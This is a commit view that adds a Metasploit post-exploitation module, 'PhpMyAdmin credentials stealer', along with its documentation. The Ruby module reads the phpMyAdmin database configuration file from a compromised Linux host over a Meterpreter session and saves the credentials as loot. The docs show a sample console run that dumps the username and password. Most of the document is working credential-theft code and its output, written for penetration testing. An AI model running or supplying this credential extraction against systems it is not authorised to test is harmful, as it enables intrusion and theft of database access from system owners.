Land #10484, Add PhpMyAdmin password extractor

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-08-30 12:16:17 -05:00
commit a9376266bc
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 106 additions and 0 deletions

View File

@ -0,0 +1,50 @@
## Description
This post module gathers PhpMyAdmin Creds from target Linux machine.
* https://www.phpmyadmin.net/downloads/ [Download URL]
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. Do: `use post/linux/gather/phpmyadmin_credsteal`
4. Do: `set SESSION [SESSION]`
5. Do: `run`
## Scenarios
```
msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400
msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
SESSION => 1
msf post(linux/gather/phpmyadmin_credsteal) > exploit
[+] PhpMyAdmin config found!
[+] Extracting config file!
<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded. *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';
$dbpass='Passw0rd';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
[*] Post module execution completed
msf post(linux/gather/phpmyadmin_credsteal) >
```

View File

@ -0,0 +1,56 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
def initialize(info={})
super(update_info(info,
'Name' => "Phpmyadmin credentials stealer",
'Description' => %q{
This module gathers Phpmyadmin creds from target linux machine.
},
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'SessionTypes' => ['meterpreter'],
'Author' => [
'Chaitanya Haritash [bofheaded]',
'Dhiraj Mishra <dhiraj@notsosecure.com>'
]
))
end
def run
print_line("\nPhpMyAdmin Creds Stealer!\n")
cred_dump = ""
if session.platform.include?("windows")
print_error("This module is not compatible with windows")
return
end
conf_path= "/etc/phpmyadmin/config-db.php"
unless file_exist?(conf_path)
print_error("#{conf_path} doesn't exist on target")
return
end
print_good('PhpMyAdmin config found!')
print_good("Extracting Creds")
res = read_file(conf_path)
unless res
print_error("You may not have permissions to read the file.")
return
end
cred_dump << res
p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
print_good("Credentials saved in #{p}")
end
end